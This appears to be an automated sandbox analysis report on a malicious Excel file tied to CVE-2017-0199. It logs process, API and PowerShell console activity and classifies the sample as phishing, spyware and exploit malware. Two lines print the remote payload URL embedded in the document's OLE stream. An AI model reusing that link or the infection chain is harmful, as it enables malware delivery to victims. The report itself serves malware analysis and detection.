        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\AppData\Roaming\wlanext.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_0040320C
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_00404A4411_2_00404A44
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_00406F5411_2_00406F54
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_0040677D11_2_0040677D
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0671E47017_2_0671E470
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0671452017_2_06714520
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0671390817_2_06713908
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_06713C5017_2_06713C50
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_06713C4517_2_06713C45
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_06717DE017_2_06717DE0
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0671B06017_2_0671B060
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2170499817_2_21704998
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_21707B2017_2_21707B20
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2170590017_2_21705900
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_217009D017_2_217009D0
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2170829117_2_21708291
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0671B41017_2_0671B410
        Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsxOLE indicator, VBA macros: true
        Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsxStream path 'MBD0079EECC/\x1Ole' : https://qrisni.me/L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&friction=reminiscent&stumbling=needless&vertigofrY;C<v-nk<-oYb7G4qPrnV7omzvXXB6AxQOq0AZAgAAsdcTTayM5DNIGRwJqiE2bCCduzyXAu4GrNBtUvim3sNoLGX8ZDKNLgDwd27aldRGX1hUGZqsQievypHYUlRmTa1Qt1d6Jn3i&s,+A?kBa>
        Source: C0230000.0.drStream path 'MBD0079EECC/\x1Ole' : https://qrisni.me/L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&friction=reminiscent&stumbling=needless&vertigofrY;C<v-nk<-oYb7G4qPrnV7omzvXXB6AxQOq0AZAgAAsdcTTayM5DNIGRwJqiE2bCCduzyXAu4GrNBtUvim3sNoLGX8ZDKNLgDwd27aldRGX1hUGZqsQievypHYUlRmTa1Qt1d6Jn3i&s,+A?kBa>
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: classification engineClassification label: mal100.phis.spyw.expl.evad.winXLSX@16/31@5/3
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_0040320C
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_004044D1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,11_2_004044D1
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_004020D1 CoCreateInstance,MultiByteToWideChar,11_2_004020D1
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsxJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR814F.tmpJump to behavior
        Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsxOLE indicator, Workbook stream: true
        Source: C0230000.0.drOLE indicator, Workbook stream: true
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.m.......m.......c.......................c.......c......................3........................c.............Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3......................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................v.l....}..w............\.......................(.P.....................H...............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............P#.......i.l............(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................v.l....}..w............\.......................(.P.....................H...............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............P#.......i.l............(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.P#.......i.l............(.P............................. .......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .D.E.v.I.c.E.c.r.e.D.E.n.T.i.A.l.D.e.p.L.o.y.m.E.N.t...e.x.E.........................@.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............P#.......i.l............(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............P#.......i.l............(.P.............................l.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w............P#.......i.l............(.P.....................................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................`.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................`.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................s.t.r.i.n.g..............................`.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................`.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.0........`.........................s............h.......".......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................`.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................a.........................s....................V.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................a.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................."a.........................s....................V.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................a.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................@a.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................La.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .l.i.d.a.t.i.o.n.E.x.c.e.p.t.i.o.n.^a.........................s............h.......(.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................ja.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................|a.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................a.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................a.........................s....................l.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................a.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................a.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................a.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................c.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................. c.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.......4c.........................s............h.......".......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Bc.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Uc.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................ac.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................tc.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................c.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................c.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................c.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................c.........................s....................`.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................c.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................c.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................c.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................c.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................d.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9........d.........................s............h.......".......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................*d.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Ad.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Md.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................._d.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................ld.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................~d.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................d.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................d.........................s....................`.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................d.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................d.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................d.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................f.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........f.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.......%f.........................s............h.......".......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................3f.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Ff.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......Tf.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......gf.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................uf.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........f.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........f.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........f.........................s....................`.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........f.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................f.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................f.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........f.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........g.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9........g.........................s............h.......".......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................%g.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................:g.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Gg.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................[g.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................gg.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......|g.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........g.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................g.........................s....................`.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................g.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................g.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................g.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........g.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................g.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9........h.........................s............h.......".......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................h.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................-h.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................;h.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Nh.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................[h.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................nh.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................zh.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................h.........................s....................`.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................h.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................h.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................h.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................h.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................i.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................i.........................s....................~.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................i.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........1i.........................s............h....... .......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................=i.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .$.K.a.t.u.k.a...I.n.v.o.k.e.(.$.P.o.i.e.s.i.s.,. .0.)..........s............h.......:.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................[i.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..........s............h.......:.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................yi.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................i.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................i.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................i.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................i.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................i.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................i.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................i.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................i.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9........j.........................s............h.......".......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................j.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................./j.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................;j.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Mj.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Yj.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................kj.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................wj.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................j.........................s....................`.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................j.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................j.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................j.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................j.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................j.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9........j.........................s............h.......".......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................j.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................k.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................k.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................*k.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................6k.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Hk.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Tk.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................fk.........................s....................`.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................rk.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................k.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................k.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................k.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................k.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9........k.........................s............h.......".......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................k.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................k.........................s............................H...............Jump to behavior
